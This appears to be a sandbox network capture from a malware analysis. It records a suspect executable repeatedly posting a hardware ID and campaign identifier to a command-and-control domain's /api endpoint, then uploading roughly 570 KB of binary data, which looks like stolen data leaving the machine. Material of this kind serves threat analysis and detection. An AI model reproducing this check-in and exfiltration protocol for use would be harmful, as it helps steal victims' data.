2024-12-26 12:14:19 UTC  47 bytes  OUT  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-26 12:14:20 UTC  1129 bytes  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 12:14:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=td889ts474u6mqbi4p5it10vlk; expires=Mon, 21 Apr 2025 06:00:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJExAa1UoOCR1gzwuslbn6ZUhiskQ6TjCwSp2tsYNlO1KvgmWnl%2BK3C%2Byc2OQeatcovAXwN8ygKdOgqodqpRieXlRSyUkajtA5seGZ6%2BgnLB%2BKuv83LCSvnC%2ByGFEvhdD%2BE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80fd6f5c2e18c8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1497&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=1889967&cwnd=148&unsent_bytes=0&cid=162ff6b3b18d371f&ts=800&x=0"


Session ID: 3
Source IP: 192.168.2.5  Source Port: 49707
Destination IP: 104.21.66.86  Destination Port: 443
PID: 5608  Process: C:\Users\user\Desktop\MaZjv5XeQi.exe
Timestamp / Bytes transferred / Direction / Data
2024-12-26 12:14:22 UTC  280 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=RN9M0MOCCIEDMK7GH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12829
Host: lev-tolstoi.com
2024-12-26 12:14:22 UTC  12829 bytes  OUT  Data Ascii (first bytes of the multipart body; CRLF boundaries restored):
--RN9M0MOCCIEDMK7GH
Content-Disposition: form-data; name="hwid"

A8DE765A6B6DDD2BBEBA0C6A975F1733
--RN9M0MOCCIEDMK7GH
Content-Disposition: form-data; name="pid"

2
--RN9M0MOCCIEDMK7GH
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
-
2024-12-26 12:14:23 UTC  1131 bytes  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 12:14:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nr46v1tkbbujhudbfgbhj9qj71; expires=Mon, 21 Apr 2025 06:01:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHwyHWLVzauTESNfa6gYnwiUOK%2B9tOYnXZV2zRxxFrvI%2Br%2FHKnXCE1n7aac%2F1KvfH%2B6rM0g7FyqedysqRYbDAA%2FsscPbrQ9IOXgisCtJyArumT7pvK9C4RGabn43caXrw5U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80fd7eedf4de98-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=18&recv=21&lost=0&retrans=1&sent_bytes=4212&recv_bytes=13767&delivery_rate=79203&cwnd=212&unsent_bytes=0&cid=a7f4520e04105a3a&ts=927&x=0"
2024-12-26 12:14:23 UTC  20 bytes  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size, then chunk body):
f
ok 8.46.123.189
2024-12-26 12:14:23 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk):
0


Session ID: 4
Source IP: 192.168.2.5  Source Port: 49708
Destination IP: 104.21.66.86  Destination Port: 443
PID: 5608  Process: C:\Users\user\Desktop\MaZjv5XeQi.exe
Timestamp / Bytes transferred / Direction / Data
2024-12-26 12:14:24 UTC  278 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OP9KY22WZVVGYZ4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15059
Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:24 UTC15059OUTData Raw: 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 50 39 4b 59
                                                                                                                                                                                                                                Data Ascii: --OP9KY22WZVVGYZ4Content-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--OP9KY22WZVVGYZ4Content-Disposition: form-data; name="pid"2--OP9KY22WZVVGYZ4Content-Disposition: form-data; name="lid"PsFKDg--pablo--OP9KY
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:25 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=94nedr24ue9e1i1lu5gcr43rkl; expires=Mon, 21 Apr 2025 06:01:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdT1kSYbtyZ6v4XqfUFJpQY%2Fkwvmj8bZo5Y0b9lWKTaWAwzT7%2FqadwxvP35QOYAEjyAPSi87KRDXQfJ7nS%2F1nDm9KnM827CX5SMDtfl%2B2p5pcehbU9Z9F7Q6t7eyzywXNLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd8d2a3442ab-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1568&rtt_var=618&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15995&delivery_rate=1729857&cwnd=199&unsent_bytes=0&cid=50ba4a41be55b4ef&ts=871&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49709       | 104.21.66.86   | 443              | 5608 | C:\Users\user\Desktop\MaZjv5XeQi.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-26 12:14:27 UTC | 271               | OUT       |
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9WS1RYM3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20507
    Host: lev-tolstoi.com
2024-12-26 12:14:27 UTC | 15331             | OUT       |
    Data Raw: 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
    Data Ascii (CRLF line breaks restored from the raw bytes):
    --9WS1RYM3
    Content-Disposition: form-data; name="hwid"

    A8DE765A6B6DDD2BBEBA0C6A975F1733
    --9WS1RYM3
    Content-Disposition: form-data; name="pid"

    3
    --9WS1RYM3
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --9WS1RYM3
    Content-Disposit
                                                                                                                                                                                                                                2024-12-26 12:14:27 UTC5176OUTData Raw: 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00
    Data Ascii (non-printable bytes dropped by the report viewer): un 4F([:7s~X`nO`i`u?
2024-12-26 12:14:28 UTC | 1133              | IN        |
    HTTP/1.1 200 OK
    Date: Thu, 26 Dec 2024 12:14:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=486r2trtuqhn2209f1nig3l0bc; expires=Mon, 21 Apr 2025 06:01:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjM%2BRizAcsAZq%2FLJuQChdeD03vE7mhBRV9W0gKlIPqteiuHfAlD2oRLZX1n9Yc2j%2FfM25mlGjQvwlNCvUB9cQo3xyZUZDDC2FW%2FvwcNy%2FQWJ4rM3O39ieExrrv%2FZEzYQOOk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f80fd9cbdbd428e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1626&rtt_var=623&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21458&delivery_rate=1795817&cwnd=222&unsent_bytes=0&cid=4ea548a367585dab&ts=975&x=0"
2024-12-26 12:14:28 UTC | 20                | IN        |
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line followed by the chunk body):
    f
    ok 8.46.123.189
2024-12-26 12:14:28 UTC | 5                 | IN        |
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii (terminating zero-length chunk):
    0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.5 | 49712       | 172.67.157.254 | 443              | 5608 | C:\Users\user\Desktop\MaZjv5XeQi.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-26 12:14:29 UTC | 277               | OUT       |
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CW22BAAPRYQOSPW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1251
    Host: lev-tolstoi.com
2024-12-26 12:14:29 UTC | 1251              | OUT       |
    Data Raw: 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 57 32 32 42
    Data Ascii (CRLF line breaks restored from the raw bytes):
    --CW22BAAPRYQOSPW
    Content-Disposition: form-data; name="hwid"

    A8DE765A6B6DDD2BBEBA0C6A975F1733
    --CW22BAAPRYQOSPW
    Content-Disposition: form-data; name="pid"

    1
    --CW22BAAPRYQOSPW
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --CW22B
2024-12-26 12:14:30 UTC | 1126              | IN        |
    HTTP/1.1 200 OK
    Date: Thu, 26 Dec 2024 12:14:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=7rk8g0d522knviin9k847p34j0; expires=Mon, 21 Apr 2025 06:01:09 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7I5GjXVIAqM6e3vHot8yH1uoeBUgFTiaN337Pw40wv3rG6DLSC7q16pfDcSte7ugc9960o%2FKAHvbCNxNSq95KMaBtLuaTVK%2FsQjDmKJ%2B3PcuyINYiCaWNuKV8dJ0%2FVOXCc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f80fdaeaefe8c3c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2065&rtt_var=784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2164&delivery_rate=1388492&cwnd=224&unsent_bytes=0&cid=e07acf6110b523e8&ts=782&x=0"
2024-12-26 12:14:30 UTC | 20                | IN        |
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii (chunk size line followed by the chunk body):
    f
    ok 8.46.123.189
2024-12-26 12:14:30 UTC | 5                 | IN        |
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii (terminating zero-length chunk):
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49715 | 172.67.157.254 | 443 | 5608 | C:\Users\user\Desktop\MaZjv5XeQi.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:14:32 UTC | 275 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=21B385563K4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 570977
Host: lev-tolstoi.com
2024-12-26 12:14:32 UTC | 15331 bytes | OUT
Data Raw: 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74
Data Ascii: --21B385563K4Content-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--21B385563K4Content-Disposition: form-data; name="pid"1--21B385563K4Content-Disposition: form-data; name="lid"PsFKDg--pablo--21B385563K4Cont
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be 01 24 82 4f 0d 94 66 25 9d 73 4e c7 e6 6a 21 8e 1c fa 74 01 58 f6 2b 42 63 0d ac 9d f5 2b 2d 36 43 11 92 e0 98 89 fc 70 e8 ec 02 71 29 ca df 30
                                                                                                                                                                                                                                Data Ascii: %!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1$Of%sNj!tX+Bc+-6Cpq)0
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29 d8 db 62 b0 b3 e7 94 52 d9 52 e3 26 16 0e 7a fa d3 3b 31 af 76 59 2b 44 94 83 bd c3 0c 7c d2 3e 25 5f 6e 31 3d aa 04 b8 5e 3d 9e 2a 62 dc 4a dd
                                                                                                                                                                                                                                Data Ascii: 6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)bRR&z;1vY+D|>%_n1=^=*bJ
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a e3 ff 4c 2f 4b 23 66 5a 82 36 a3 64 16 74 85 5c 95 be 0e 11 7b 6e fd f0 9d 65 37 6a e9 39 7f ba 3b fb 39 63 55 f9 74 64 90 dc a6 0e 00 2e 9a
                                                                                                                                                                                                                                Data Ascii: t+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=L/K#fZ6dt\{ne7j9;9cUtd.
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf 47 b5 68 6e 0a 2a 30 27 2d 9c 21 98 9e 38 15 91 4e d1 ae e0 a8 7a ab c0 d6 ca e9 44 2d 96 2a b8 48 87 cd 3f 37 9e d5 41 04 c1 9f bf e4 13 4f
                                                                                                                                                                                                                                Data Ascii: W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422Ghn*0'-!8NzD-*H?7AO
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2 8e f4 ae e9 41 43 92 e9 24 36 c5 05 46 3e d7 c1 c1 ee 99 b5 80 4d 17 6c 36 90 da de 78 90 61 3a 79 4f 65 76 bb d3 de b0 97 79 97 e9 34 f8 76
                                                                                                                                                                                                                                Data Ascii: &1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9AC$6F>Ml6xa:yOevy4v
